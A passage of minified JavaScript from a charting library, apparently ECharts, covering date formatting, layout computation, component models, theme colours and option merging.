ld[t]}(i||ud)||ld[ad],m=y.getModel("time"),_=m.get("month"),x=m.get("monthAbbr"),b=m.get("dayOfWeek"),w=m.get("dayOfWeekAbbr");return(e||"").replace(/{a}/g,g+"").replace(/{A}/g,v+"").replace(/{yyyy}/g,o+"").replace(/{yy}/g,Id(o%100+"",2)).replace(/{Q}/g,s+"").replace(/{MMMM}/g,_[a-1]).replace(/{MMM}/g,x[a-1]).replace(/{MM}/g,Id(a,2)).replace(/{M}/g,a+"").replace(/{dd}/g,Id(l,2)).replace(/{d}/g,l+"").replace(/{eeee}/g,b[u]).replace(/{ee}/g,w[u]).replace(/{e}/g,u+"").replace(/{HH}/g,Id(c,2)).replace(/{H}/g,c+"").replace(/{hh}/g,Id(h+"",2)).replace(/{h}/g,h+"").replace(/{mm}/g,Id(p,2)).replace(/{m}/g,p+"").replace(/{ss}/g,Id(d,2)).replace(/{s}/g,d+"").replace(/{SSS}/g,Id(f,3)).replace(/{S}/g,f+"")}function Ld(t,e){var n=jo(t),i=n[Nd(e)]()+1,r=n[Bd(e)](),o=n[zd(e)](),a=n[Ed(e)](),s=n[Vd(e)](),l=0===n[Fd(e)](),u=l&&0===s,c=u&&0===a,h=c&&0===o,p=h&&1===r;return p&&1===i?"year":p?"month":h?"day":c?"hour":u?"minute":l?"second":"millisecond"}function Od(t,e,n){switch(e){case"year":t[Gd(n)](0);case"month":t[Wd(n)](1);case"day":t[Ud(n)](0);case"hour":t[Zd(n)](0);case"minute":t[Yd(n)](0);case"second":t[Xd(n)](0)}return t}function Rd(t){return t?"getUTCFullYear":"getFullYear"}function Nd(t){return t?"getUTCMonth":"getMonth"}function Bd(t){return t?"getUTCDate":"getDate"}function zd(t){return t?"getUTCHours":"getHours"}function Ed(t){return t?"getUTCMinutes":"getMinutes"}function Vd(t){return t?"getUTCSeconds":"getSeconds"}function Fd(t){return t?"getUTCMilliseconds":"getMilliseconds"}function Hd(t){return t?"setUTCFullYear":"setFullYear"}function Gd(t){return t?"setUTCMonth":"setMonth"}function Wd(t){return t?"setUTCDate":"setDate"}function Ud(t){return t?"setUTCHours":"setHours"}function Zd(t){return t?"setUTCMinutes":"setMinutes"}function Yd(t){return t?"setUTCSeconds":"setSeconds"}function Xd(t){return t?"setUTCMilliseconds":"setMilliseconds"}function jd(t){if(!Jo(t))return j(t)?t:"-";var e=(t+"").split(".");return e[0].replace(/(\d{1,3})(?=(?:\d{3})+(?!\d))/g,"$1,")+(e.length>1?"."+e[1]:"")}function qd(t,e){return t=(t||"").toLowerCase().replace(/-(.)/g,function(t,e){return e.toUpperCase()}),e&&t&&(t=t.charAt(0).toUpperCase()+t.slice(1)),t}var Kd=ut;function $d(t,e,n){function i(t){return t&&ht(t)?t:"-"}function r(t){return ia(t)}var o="time"===e,a=t instanceof Date;if(o||a){var s=o?jo(t):t;if(!isNaN(+s))return Pd(s,"{yyyy}-{MM}-{dd} {HH}:{mm}:{ss}",n);if(a)return"-"}if("ordinal"===e)return q(t)?i(t):K(t)&&r(t)?t+"":"-";var l=Qo(t);return r(l)?jd(l):q(t)?i(t):"boolean"==typeof t?t+"":"-"}var Qd=["a","b","c","d","e","f","g"],Jd=function(t,e){return"{"+t+(null==e?"":e)+"}"};function tf(t,e,n){Y(e)||(e=[e]);var i=e.length;if(!i)return"";for(var r=e[0].$vars||[],o=0;o<r.length;o++){var a=Qd[o];t=t.replace(Jd(a),Jd(a,0))}for(var s=0;s<i;s++)for(var l=0;l<r.length;l++){var u=e[s][r[l]];t=t.replace(Jd(Qd[l],s),n?ae(u):u)}return t}function ef(t,e){var n=j(t)?{color:t,extraCssText:e}:t||{},i=n.color,r=n.type;e=n.extraCssText;var o=n.renderMode||"html";return i?"html"===o?"subItem"===r?'<span style="display:inline-block;vertical-align:middle;margin-right:8px;margin-left:3px;border-radius:4px;width:4px;height:4px;background-color:'+ae(i)+";"+(e||"")+'"></span>':'<span style="display:inline-block;margin-right:4px;border-radius:10px;width:10px;height:10px;background-color:'+ae(i)+";"+(e||"")+'"></span>':{renderMode:o,content:"{"+(n.markerId||"markerX")+"|} ",style:"subItem"===r?{width:4,height:4,borderRadius:2,backgroundColor:i}:{width:10,height:10,borderRadius:5,backgroundColor:i}}:""}function nf(t,e){return e=e||"transparent",j(t)?t:$(t)&&t.colorStops&&(t.colorStops[0]||{}).color||e}function rf(t,e){if("_blank"===e||"blank"===e){var n=window.open();n.opener=null,n.location.href=t}else window.open(t,e)}var of={},af={},sf=function(){function t(){this._normalMasterList=[],this._nonSeriesBoxMasterList=[]}return t.prototype.create=function(t,e){function n(n,i){var r=[];return E(n,function(n,i){var o=n.create(t,e);r=r.concat(o||[])}),r}this._nonSeriesBoxMasterList=n(of,!0),this._normalMasterList=n(af,!1)},t.prototype.update=function(t,e){E(this._normalMasterList,function(n){n.update&&n.update(t,e)})},t.prototype.getCoordinateSystems=function(){return this._normalMasterList.concat(this._nonSeriesBoxMasterList)},t.register=function(t,e){"matrix"!==t&&"calendar"!==t?af[t]=e:of[t]=e},t.get=function(t){return af[t]||of[t]},t}();var lf=mt();function uf(t){var e=t.getShallow("coord",!0),n=1;if(null==e){var i=lf.get(t.type);i&&i.getCoord2&&(n=2,e=i.getCoord2(t))}return{coord:e,from:n}}function cf(t,e){var n=t.getShallow("coordinateSystem"),i=t.getShallow("coordinateSystemUsage",!0),r=0;if(n){var o="series"===t.mainType;null==i&&(i=o?"data":"box"),"data"===i?(r=1,o||(r=0)):"box"===i&&(r=2,o||function(t){return!!of[t]}(n)||(r=0))}return{coordSysType:n,kind:r}}var hf=E,pf=["left","right","top","bottom","width","height"],df=[["width","left","right"],["height","top","bottom"]];function ff(t,e,n,i,r){var o=0,a=0;null==i&&(i=1/0),null==r&&(r=1/0);var s=0;e.eachChild(function(l,u){var c,h,p=l.getBoundingRect(),d=e.childAt(u+1),f=d&&d.getBoundingRect();if("horizontal"===t){var g=p.width+(f?-f.x+p.x:0);(c=o+g)>i||l.newline?(o=0,c=g,a+=s+n,s=p.height):s=Math.max(s,p.height)}else{var v=p.height+(f?-f.y+p.y:0);(h=a+v)>r||l.newline?(o+=s+n,a=0,h=v,s=p.width):s=Math.max(s,p.width)}l.newline||(l.x=o,l.y=a,l.markRedraw(),"horizontal"===t?o=c+n:a=h+n)})}var gf=ff;Z(ff,"vertical"),Z(ff,"horizontal");function vf(t,e){var n=function(t,e){var n,i,r=_f(t,e,{enableLayoutOnlyByCenter:!0}),o=t.getBoxLayoutParams();if(r.type===mf.point)i=r.refPoint,n=yf(o,{width:e.getWidth(),height:e.getHeight()});else{var a=t.get("center"),s=Y(a)?a:[a,a];n=yf(o,r.refContainer),i=2===r.boxCoordFrom?r.refPoint:[No(s[0],n.width)+n.x,No(s[1],n.height)+n.y]}return{viewRect:n,center:i}}(t,e),i=n.viewRect,r=n.center,o=t.get("radius");Y(o)||(o=[0,o]);var a=No(i.width,e.getWidth()),s=No(i.height,e.getHeight()),l=Math.min(a,s),u=No(o[0],l/2),c=No(o[1],l/2);return{cx:r[0],cy:r[1],r0:u,r:c,viewRect:i}}function yf(t,e,n){n=Kd(n||0);var i=e.width,r=e.height,o=No(t.left,i),a=No(t.top,r),s=No(t.right,i),l=No(t.bottom,r),u=No(t.width,i),c=No(t.height,r),h=n[2]+n[0],p=n[1]+n[3],d=t.aspect;switch(isNaN(u)&&(u=i-s-p-o),isNaN(c)&&(c=r-l-h-a),null!=d&&(isNaN(u)&&isNaN(c)&&(d>i/r?u=.8*i:c=.8*r),isNaN(u)&&(u=d*c),isNaN(c)&&(c=u/d)),isNaN(o)&&(o=i-s-u-p),isNaN(a)&&(a=r-l-c-h),t.left||t.right){case"center":o=i/2-u/2-n[3];break;case"right":o=i-u-p}switch(t.top||t.bottom){case"middle":case"center":a=r/2-c/2-n[0];break;case"bottom":a=r-c-h}o=o||0,a=a||0,isNaN(u)&&(u=i-p-o-(s||0)),isNaN(c)&&(c=r-h-a-(l||0));var f=new Ue((e.x||0)+o+n[3],(e.y||0)+a+n[0],u,c);return f.margin=n,f}var mf={rect:1,point:2};function _f(t,e,n){var i,r,o,a,s=t.boxCoordinateSystem;if(s){var l=uf(t),u=l.coord,c=l.from;if(s.dataToLayout){o=mf.rect,a=c;var h=s.dataToLayout(u);i=h.contentRect||h.rect}else n&&n.enableLayoutOnlyByCenter&&s.dataToPoint&&(o=mf.point,a=c,r=s.dataToPoint(u))}return null==o&&(o=mf.rect),o===mf.rect&&(i||(i={x:0,y:0,width:e.getWidth(),height:e.getHeight()}),r=[i.x+i.width/2,i.y+i.height/2]),{type:o,refContainer:i,refPoint:r,boxCoordFrom:a}}function xf(t,e,n,i,r,o){var a,s=!r||!r.hv||r.hv[0],l=!r||!r.hv||r.hv[1],u=r&&r.boundingMode||"all";if((o=o||t).x=t.x,o.y=t.y,!s&&!l)return!1;if("raw"===u)a="group"===t.type?new Ue(0,0,+e.width||0,+e.height||0):t.getBoundingRect();else if(a=t.getBoundingRect(),t.needLocalTransform()){var c=t.getLocalTransform();(a=a.clone()).applyTransform(c)}var h=yf(L({width:a.width,height:a.height},e),n,i),p=s?h.x-a.x:0,d=l?h.y-a.y:0;return"raw"===u?(o.x=p,o.y=d):(o.x+=p,o.y+=d),o===t&&t.markRedraw(),!0}function bf(t){var e=t.layoutMode||t.constructor.layoutMode;return $(e)?e:e?{type:e}:null}function wf(t,e,n){var i=n&&n.ignoreSize;!Y(i)&&(i=[i,i]);var r=a(df[0],0),o=a(df[1],1);function a(n,r){var o={},a=0,l={},u=0;if(hf(n,function(e){l[e]=t[e]}),hf(n,function(t){wt(e,t)&&(o[t]=l[t]=e[t]),s(o,t)&&a++,s(l,t)&&u++}),i[r])return s(e,n[1])?l[n[2]]=null:s(e,n[2])&&(l[n[1]]=null),l;if(2!==u&&a){if(a>=2)return o;for(var c=0;c<n.length;c++){var h=n[c];if(!wt(o,h)&&wt(t,h)){o[h]=t[h];break}}return o}return l}function s(t,e){return null!=t[e]&&"auto"!==t[e]}function l(t,e,n){hf(t,function(t){e[t]=n[t]})}l(df[0],t,r),l(df[1],t,o)}function Sf(t){return Mf({},t)}function Mf(t,e){return e&&t&&hf(pf,function(n){wt(e,n)&&(t[n]=e[n])}),t}var Tf=Ta(),kf=function(t){function e(e,n,i){var r=t.call(this,e,n,i)||this;return r.uid=nd("ec_cpt_model"),r}var i;return n(e,t),e.prototype.init=function(t,e,n){this.mergeDefaultAndTheme(t,n)},e.prototype.mergeDefaultAndTheme=function(t,e){var n=bf(this),i=n?Sf(t):{};I(t,e.getTheme().get(this.mainType)),I(t,this.getDefaultOption()),n&&wf(t,i,n)},e.prototype.mergeOption=function(t,e){I(this.option,t,!0);var n=bf(this);n&&wf(this.option,t,n)},e.prototype.optionUpdated=function(t,e){},e.prototype.getDefaultOption=function(){var t=this.constructor;if(!function(t){return!(!t||!t[qa])}(t))return t.defaultOption;var e=Tf(this);if(!e.defaultOption){for(var n=[],i=t;i;){var r=i.prototype.defaultOption;r&&n.push(r),i=i.superClass}for(var o={},a=n.length-1;a>=0;a--)o=I(o,n[a],!0);e.defaultOption=o}return e.defaultOption},e.prototype.getReferringComponents=function(t,e){var n=t+"Index",i=t+"Id";return Pa(this.ecModel,t,{index:this.get(n,!0),id:this.get(i,!0)},e)},e.prototype.getBoxLayoutParams=function(){return e=!1,{left:(t=this).getShallow("left",e),top:t.getShallow("top",e),right:t.getShallow("right",e),bottom:t.getShallow("bottom",e),width:t.getShallow("width",e),height:t.getShallow("height",e)};var t,e},e.prototype.getZLevelKey=function(){return""},e.prototype.setZLevel=function(t){this.option.zlevel=t},e.protoInitialize=((i=e.prototype).type="component",i.id="",i.name="",i.mainType="",i.subType="",void(i.componentIndex=0)),e}(td);Qa(kf,td),ns(kf),function(t){var e={};t.registerSubTypeDefaulter=function(t,n){var i=Ka(t);e[i.main]=n},t.determineSubType=function(n,i){var r=i.type;if(!r){var o=Ka(n).main;t.hasSubTypes(n)&&e[o]&&(r=e[o](i))}return r}}(kf),function(t,e){function n(t,e){return t[e]||(t[e]={predecessor:[],successor:[]}),t[e]}t.topologicalTravel=function(t,i,r,o){if(t.length){var a=function(t){var i={},r=[];return E(t,function(o){var a=n(i,o),s=function(t,e){var n=[];return E(t,function(t){R(e,t)>=0&&n.push(t)}),n}(a.originalDeps=e(o),t);a.entryCount=s.length,0===a.entryCount&&r.push(o),E(s,function(t){R(a.predecessor,t)<0&&a.predecessor.push(t);var e=n(i,t);R(e.successor,t)<0&&e.successor.push(o)})}),{graph:i,noEntryList:r}}(i),s=a.graph,l=a.noEntryList,u={};for(E(t,function(t){u[t]=!0});l.length;){var c=l.pop(),h=s[c],p=!!u[c];p&&(r.call(o,c,h.originalDeps.slice()),delete u[c]),E(h.successor,p?f:d)}E(u,function(){var t="";throw new Error(t)})}function d(t){s[t].entryCount--,0===s[t].entryCount&&l.push(t)}function f(t){u[t]=!0,d(t)}}}(kf,function(t){var e=[];E(kf.getClassesByMainType(t),function(t){e=e.concat(t.dependencies||t.prototype.dependencies||[])}),e=V(e,function(t){return Ka(t).main}),"dataset"!==t&&R(e,"dataset")<=0&&e.unshift("dataset");return e});var Cf={color:{},darkColor:{},size:{}},If=Cf.color={theme:["#5070dd","#b6d634","#505372","#ff994d","#0ca8df","#ffd10a","#fb628b","#785db0","#3fbe95"],neutral00:"#fff",neutral05:"#f4f7fd",neutral10:"#e8ebf0",neutral15:"#dbdee4",neutral20:"#cfd2d7",neutral25:"#c3c5cb",neutral30:"#b7b9be",neutral35:"#aaacb2",neutral40:"#9ea0a5",neutral45:"#929399",neutral50:"#86878c",neutral55:"#797b7f",neutral60:"#6d6e73",neutral65:"#616266",neutral70:"#54555a",neutral75:"#48494d",neutral80:"#3c3c41",neutral85:"#303034",neutral90:"#232328",neutral95:"#17171b",neutral99:"#000",accent05:"#eff1f9",accent10:"#e0e4f2",accent15:"#d0d6ec",accent20:"#c0c9e6",accent25:"#b1bbdf",accent30:"#a1aed9",accent35:"#91a0d3",accent40:"#8292cc",accent45:"#7285c6",accent50:"#6578ba",accent55:"#5c6da9",accent60:"#536298",accent65:"#4a5787",accent70:"#404c76",accent75:"#374165",accent80:"#2e3654",accent85:"#252b43",accent90:"#1b2032",accent95:"#121521",transparent:"rgba(0,0,0,0)",highlight:"rgba(255,231,130,0.8)"};for(var Df in A(If,{primary:If.neutral80,secondary:If.neutral70,tertiary:If.neutral60,quaternary:If.neutral50,disabled:If.neutral20,border:If.neutral30,borderTint:If.neutral20,borderShade:If.neutral40,background:If.neutral05,backgroundTint:"rgba(234,237,245,0.5)",backgroundTransparent:"rgba(255,255,255,0)",backgroundShade:If.neutral10,shadow:"rgba(0,0,0,0.2)",shadowTint:"rgba(129,130,136,0.2)",axisLine:If.neutral70,axisLineTint:If.neutral40,axisTick:If.neutral70,axisTickMinor:If.neutral60,axisLabel:If.neutral70,axisSplitLine:If.neutral15,axisMinorSplitLine:If.neutral05}),If)if(If.hasOwnProperty(Df)){var Af=If[Df];"theme"===Df?Cf.darkColor.theme=If.theme.slice():"highlight"===Df?Cf.darkColor.highlight="rgba(255,231,130,0.4)":0===Df.indexOf("accent")?Cf.darkColor[Df]=mi(Af,null,function(t){return.5*t},function(t){return Math.min(1,1.3-t)}):Cf.darkColor[Df]=mi(Af,null,function(t){return.9*t},function(t){return 1-Math.pow(t,1.5)})}Cf.size={xxs:2,xs:5,s:10,m:15,l:20,xl:30,xxl:40,xxxl:50};var Pf="";"undefined"!=typeof navigator&&(Pf=navigator.platform||"");var Lf="rgba(0, 0, 0, 0.2)",Of=Cf.color.theme[0],Rf=mi(Of,null,null,.9),Nf={darkMode:"auto",colorBy:"series",color:Cf.color.theme,gradientColor:[Rf,Of],aria:{decal:{decals:[{color:Lf,dashArrayX:[1,0],dashArrayY:[2,5],symbolSize:1,rotation:Math.PI/6},{color:Lf,symbol:"circle",dashArrayX:[[8,8],[0,8,8,0]],dashArrayY:[6,0],symbolSize:.8},{color:Lf,dashArrayX:[1,0],dashArrayY:[4,3],rotation:-Math.PI/4},{color:Lf,dashArrayX:[[6,6],[0,6,6,0]],dashArrayY:[6,0]},{color:Lf,dashArrayX:[[1,0],[1,6]],dashArrayY:[1,0,6,0],rotation:Math.PI/4},{color:Lf,symbol:"triangle",dashArrayX:[[9,9],[0,9,9,0]],dashArrayY:[7,2],symbolSize:.75}]}},textStyle:{fontFamily:Pf.match(/^Win/)?"Microsoft YaHei":"sans-serif",fontSize:12,fontStyle:"normal",fontWeight:"normal"},blendMode:null,stateAnimation:{duration:300,easing:"cubicOut"},animation:"auto",animationDuration:1e3,animationDurationUpdate:500,animationEasing:"cubicInOut",animationEasingUpdate:"cubicInOut",animationThreshold:2e3,progressiveThreshold:3e3,progressive:400,hoverLayerThreshold:3e3,useUTC:!1},Bf=1,zf=2,Ef=3,Vf=Ta();function Ff(t,e,n){var i={},r=Gf(e);if(!r||!t)return i;var o,a,s=[],l=[],u=e.ecModel,c=Vf(u).datasetMap,h=r.uid+"_"+n.seriesLayoutBy;E(t=t.slice(),function(e,n){var r=$(e)?e:t[n]={name:e};"ordinal"===r.type&&null==o&&(o=n,a=f(r)),i[r.name]=[]});var p=c.get(h)||c.set(h,{categoryWayDim:a,valueWayDim:0});function d(t,e,n){for(var i=0;i<n;i++)t.push(e+i)}function f(t){var e=t.dimsDef;return e?e.length:1}return E(t,function(t,e){var n=t.name,r=f(t);if(null==o){var a=p.valueWayDim;d(i[n],a,r),d(l,a,r),p.valueWayDim+=r}else if(o===e)d(i[n],0,r),d(s,0,r);else{a=p.categoryWayDim;d(i[n],a,r),d(l,a,r),p.categoryWayDim+=r}}),s.length&&(i.itemName=s),l.length&&(i.seriesName=l),i}function Hf(t,e,n){var i={};if(!Gf(t))return i;var r,o=e.sourceFormat,a=e.dimensionsDefine;o!==yu&&o!==mu||E(a,function(t,e){"name"===($(t)?t.name:t)&&(r=e)});var s=function(){for(var t={},i={},s=[],l=0,u=Math.min(5,n);l<u;l++){var c=Uf(e.data,o,e.seriesLayoutBy,a,e.startIndex,l);s.push(c);var h=c===Ef;if(h&&null==t.v&&l!==r&&(t.v=l),(null==t.n||t.n===t.v||!h&&s[t.n]===Ef)&&(t.n=l),p(t)&&s[t.n]!==Ef)return t;h||(c===zf&&null==i.v&&l!==r&&(i.v=l),null!=i.n&&i.n!==i.v||(i.n=l))}function p(t){return null!=t.v&&null!=t.n}return p(t)?t:p(i)?i:null}();if(s){i.value=[s.v];var l=null!=r?r:s.n;i.itemName=[l],i.seriesName=[l]}return i}function Gf(t){if(!t.get("data",!0))return Pa(t.ecModel,"dataset",{index:t.get("datasetIndex",!0),id:t.get("datasetId",!0)},Da).models[0]}function Wf(t,e){return Uf(t.data,t.sourceFormat,t.seriesLayoutBy,t.dimensionsDefine,t.startIndex,e)}function Uf(t,e,n,i,r,o){var a,s,l;if(J(t))return Ef;if(i){var u=i[o];$(u)?(s=u.name,l=u.type):j(u)&&(s=u)}if(null!=l)return"ordinal"===l?Bf:Ef;if(e===vu){var c=t;if(n===wu){for(var h=c[o],p=0;p<(h||[]).length&&p<5;p++)if(null!=(a=m(h[r+p])))return a}else for(p=0;p<c.length&&p<5;p++){var d=c[r+p];if(d&&null!=(a=m(d[o])))return a}}else if(e===yu){var f=t;if(!s)return Ef;for(p=0;p<f.length&&p<5;p++){if((v=f[p])&&null!=(a=m(v[s])))return a}}else if(e===mu){if(!s)return Ef;if(!(h=t[s])||J(h))return Ef;for(p=0;p<h.length&&p<5;p++)if(null!=(a=m(h[p])))return a}else if(e===gu){var g=t;for(p=0;p<g.length&&p<5;p++){var v,y=va(v=g[p]);if(!Y(y))return Ef;if(null!=(a=m(y[o])))return a}}function m(t){var e=j(t);return null!=t&&isFinite(Number(t))&&""!==t?e?zf:Ef:e&&"-"!==t?Bf:void 0}return Ef}var Zf=mt();var Yf,Xf,jf,qf=Ta(),Kf=Ta(),$f=function(){function t(){}return t.prototype.getColorFromPalette=function(t,e,n){var i=da(this.get("color",!0)),r=this.get("colorLayer",!0);return Jf(this,qf,i,r,t,e,n)},t.prototype.clearColorPalette=function(){!function(t,e){e(t).paletteIdx=0,e(t).paletteNameMap={}}(this,qf)},t}();function Qf(t,e,n,i){var r=da(t.get(["aria","decal","decals"]));return Jf(t,Kf,r,null,e,n,i)}function Jf(t,e,n,i,r,o,a){var s=e(o=o||t),l=s.paletteIdx||0,u=s.paletteNameMap=s.paletteNameMap||{};if(u.hasOwnProperty(r))return u[r];var c=null!=a&&i?function(t,e){for(var n=t.length,i=0;i<n;i++)if(t[i].length>e)return t[i];return t[n-1]}(i,a):n;if((c=c||n)&&c.length){var h=c[l];return r&&(u[r]=h),s.paletteIdx=(l+1)%c.length,h}}var tg="\0_ec_inner";var eg=function(t){function e(){return null!==t&&t.apply(this,arguments)||this}return n(e,t),e.prototype.init=function(t,e,n,i,r,o){i=i||{},this.option=null,this._theme=new td(i),this._locale=new td(r),this._optionManager=o},e.prototype.setOption=function(t,e,n){var i=rg(e);this._optionManager.setOption(t,n,i),this._resetOption(null,i)},e.prototype.resetOption=function(t,e){return this._resetOption(t,rg(e))},e.prototype._resetOption=function(t,e){var n=!1,i=this._optionManager;if(!t||"recreate"===t){var r=i.mountOption("recreate"===t);0,this.option&&"recreate"!==t?(this.restoreData(),this._mergeOption(r,e)):jf(this,r),n=!0}if("timeline"!==t&&"media"!==t||this.restoreData(),!t||"recreate"===t||"timeline"===t){var o=i.getTimelineOption(this);o&&(n=!0,this._mergeOption(o,e))}if(!t||"recreate"===t||"media"===t){var a=i.getMediaOption(this);a.length&&E(a,function(t){n=!0,this._mergeOption(t,e)},this)}return n},e.prototype.mergeOption=function(t){this._mergeOption(t,null)},e.prototype._mergeOption=function(t,e){var n=this.option,i=this._componentsMap,r=this._componentsCount,o=[],a=mt(),s=e&&e.replaceMergeMainTypeMap;Vf(this).datasetMap=mt(),E(t,function(t,e){null!=t&&(kf.hasClass(e)?e&&(o.push(e),a.set(e,!0)):n[e]=null==n[e]?C(t):I(n[e],t,!0))}),s&&s.each(function(t,e){kf.hasClass(e)&&!a.get(e)&&(o.push(e),a.set(e,!0))}),kf.topologicalTravel(o,kf.getAllClassMainTypes(),function(e){var o=function(t,e,n){var i=Zf.get(e);if(!i)return n;var r=i(t);return r?n.concat(r):n}(this,e,da(t[e])),a=i.get(e),l=a?s&&s.get(e)?"replaceMerge":"normalMerge":"replaceAll",u=ma(a,o,l);(function(t,e,n){E(t,function(t){var i=t.newOption;$(i)&&(t.keyInfo.mainType=e,t.keyInfo.subType=function(t,e,n,i){return e.type?e.type:n?n.subType:i.determineSubType(t,e)}(e,i,t.existing,n))})})(u,e,kf),n[e]=null,i.set(e,null),r.set(e,0);var c,h=[],p=[],d=0;E(u,function(t,n){var i=t.existing,r=t.newOption;if(r){var o="series"===e,a=kf.getClass(e,t.keyInfo.subType,!o);if(!a)return;if("tooltip"===e){if(c)return void 0;c=!0}if(i&&i.constructor===a)i.name=t.keyInfo.name,i.mergeOption(r,this),i.optionUpdated(r,!1);else{var s=A({componentIndex:n},t.keyInfo);A(i=new a(r,this,this,s),s),t.brandNew&&(i.__requireNewView=!0),i.init(r,this,this),i.optionUpdated(null,!0)}}else i&&(i.mergeOption({},this),i.optionUpdated({},!1));i?(h.push(i.option),p.push(i),d++):(h.push(void 0),p.push(void 0))},this),n[e]=h,i.set(e,p),r.set(e,d),"series"===e&&Yf(this)},this),this._seriesIndices||Yf(this)},e.prototype.getOption=function(){var t=C(this.option);return E(t,function(e,n){if(kf.hasClass(n)){for(var i=da(e),r=i.length,o=!1,a=r-1;a>=0;a--)i[a]&&!Sa(i[a])?o=!0:(i[a]=null,!o&&r--);i.length=r,t[n]=i}}),delete t[tg],t},e.prototype.setTheme=function(t){this._theme=new td(t),this._resetOption("recreate",null)},e.prototype.getTheme=function(){return this._theme},e.prototype.getLocaleModel=function(){return this._locale},e.prototype.setUpdatePayload=function(t){this._payload=t},e.prototype.getUpdatePayload=function(){return this._payload},e.prototype.getComponent=function(t,e){var n=this._componentsMap.get(t);if(n){var i=n[e||0];if(i)return i;if(null==e)for(var r=0;r<n.length;r++)if(n[r])return n[r]}},e.prototype.queryComponents=function(t){var e=t.mainType;if(!e)return[];var n,i=t.index,r=t.id,o=t.name,a=this._componentsMap.get(e);return a&&a.length?(null!=i?(n=[],E(da(i),function(t){a[t]&&n.push(a[t])})):n=null!=r?ng("id",r,a):null!=o?ng("name",o,a):H(a,function(t){return!!t}),ig(n,t)):[]},e.prototype.findComponents=function(t){var e,n,i,r,o,a=t.query,s=t.mainType,l=(n=s+"Index",i=s+"Id",r=s+"Name",!(e=a)||null==e[n]&&null==e[i]&&null==e[r]?null:{mainType:s,index:e[n],id:e[i],name:e[r]}),u=l?this.queryComponents(l):H(this._componentsMap.get(s),function(t){return!!t});return o=ig(u,t),t.filter?H(o,t.filter):o},e.prototype.eachComponent=function(t,e,n){var i=this._componentsMap;if(X(t)){var r=e,o=t;i.each(function(t,e){for(var n=0;t&&n<t.length;n++){var i=t[n];i&&o.call(r,e,i,i.componentIndex)}})}else for(var a=j(t)?i.get(t):$(t)?this.findComponents(t):null,s=0;a&&s<a.length;s++){var l=a[s];l&&e.call(n,l,l.componentIndex)}},e.prototype.getSeriesByName=function(t){var e=ba(t,null);return H(this._componentsMap.get("series"),function(t){return!!t&&null!=e&&t.name===e})},e.prototype.getSeriesByIndex=function(t){return this._componentsMap.get("series")[t]},e.prototype.getSeriesByType=function(t){return H(this._componentsMap.get("series"),function(e){return!!e&&e.subType===t})},e.prototype.getSeries=function(){return H(this._componentsMap.get("series"),function(t){return!!t})},e.prototype.getSeriesCount=function(){return this._componentsCount.get("series")},e.prototype.eachSeries=function(t,e){Xf(this),E(this._seriesIndices,function(n){var i=this._componentsMap.get("series")[n];t.call(e,i,n)},this)},e.prototype.eachRawSeries=function(t,e){E(this._componentsMap.get("series"),function(n){n&&t.call(e,n,n.componentIndex)})},e.prototype.eachSeriesByType=function(t,e,n){Xf(this),E(this._seriesIndices,function(i){var r=this._componentsMap.get("series")[i];r.subType===t&&e.call(n,r,i)},this)},e.prototype.eachRawSeriesByType=function(t,e,n){return E(this.getSeriesByType(t),e,n)},e.prototype.isSeriesFiltered=function(t){return Xf(this),null==this._seriesIndicesMap.get(t.componentIndex)},e.prototype.getCurrentSeriesIndices=function(){return(this._seriesIndices||[]).slice()},e.prototype.filterSeries=function(t,e){Xf(this);var n=[];E(this._seriesIndices,function(i){var r=this._componentsMap.get("series")[i];t.call(e,r,i)&&n.push(i)},this),this._seriesIndices=n,this._seriesIndicesMap=mt(n)},e.prototype.restoreData=function(t){Yf(this);var e=this._componentsMap,n=[];e.each(function(t,e){kf.hasClass(e)&&n.push(e)}),kf.topologicalTravel(n,kf.getAllClassMainTypes(),function(n){E(e.get(n),function(e){!e||"series"===n&&function(t,e){if(e){var n=e.seriesIndex,i=e.seriesId,r=e.seriesName;return null!=n&&t.componentIndex!==n||null!=i&&t.id!==i||null!=r&&t.name!==r}}(e,t)||e.restoreData()})})},e.internalField=(Yf=function(t){var e=t._seriesIndices=[];E(t._componentsMap.get("series"),function(t){t&&e.push(t.componentIndex)}),t._seriesIndicesMap=mt(e)},Xf=function(t){},void(jf=function(t,e){t.option={},t.option[tg]=1,t._componentsMap=mt({series:[]}),t._componentsCount=mt();var n=e.aria;$(n)&&null==n.enabled&&(n.enabled=!0),function(t,e){var n=t.color&&!t.colorLayer;E(e,function(e,i){"colorLayer"===i&&n||"color"===i&&t.color||kf.hasClass(i)||("object"==typeof e?t[i]=t[i]?I(t[i],e,!1):C(e):null==t[i]&&(t[i]=e))})}(e,t._theme.option),I(e,Nf,!1),t._mergeOption(e,null)})),e}(td);function ng(t,e,n){if(Y(e)){var i=mt();return E(e,function(t){null!=t&&(null!=ba(t,null)&&i.set(t,!0))}),H(n,function(e){return e&&i.get(e[t])})}var r=ba(e,null);return H(n,function(e){return e&&null!=r&&e[t]===r})}function ig(t,e){return e.hasOwnProperty("subType")?H(t,function(t){return t&&t.subType===e.subType}):t}function rg(t){var e=mt();return t&&E(da(t.replaceMerge),function(t){e.set(t,!0)}),{replaceMergeMainTypeMap:e}}B(eg,$f);var og=/^(min|max)?(.+)$/,ag=function(){function t(t){this._timelineOptions=[],this._mediaList=[],this._currentMediaIndices=[],this._api=t}return t.prototype.setOption=function(t,e,n){t&&(E(da(t.series),function(t){t&&t.data&&J(t.data)&&dt(t.data)}),E(da(t.dataset),function(t){t&&t.source&&J(t.source)&&dt(t.source)})),t=C(t);var i=this._optionBackup,r=function(t,e,n){var i,r,o=[],a=t.baseOption,s=t.timeline,l=t.options,u=t.media,c=!!t.media,h=!!(l||s||a&&a.timeline);a?(r=a).timeline||(r.timeline=s):((h||c)&&(t.options=t.media=null),r=t);c&&Y(u)&&E(u,function(t){t&&t.option&&(t.query?o.push(t):i||(i=t))});function p(t){E(e,function(e){e(t,n)})}return p(r),E(l,function(t){return p(t)}),E(o,function(t){return p(t.option)}),{baseOption:r,timelineOptions:l||[],mediaDefault:i,mediaList:o}}(t,e,!i);this._newBaseOption=r.baseOption,i?(r.timelineOptions.length&&(i.timelineOptions=r.timelineOptions),r.mediaList.length&&(i.mediaList=r.mediaList),r.mediaDefault&&(i.mediaDefault=r.mediaDefault)):this._optionBackup=r},t.prototype.mountOption=function(t){var e=this._optionBackup;return this._timelineOptions=e.timelineOptions,this._mediaList=e.mediaList,this._mediaDefault=e.mediaDefault,this._currentMediaIndices=[],C(t?e.baseOption:this._newBaseOption)},t.prototype.getTimelineOption=function(t){var e,n=this._timelineOptions;if(n.length){var i=t.getComponent("timeline");i&&(e=C(n[i.getCurrentIndex()]))}return e},t.prototype.getMediaOption=function(t){var 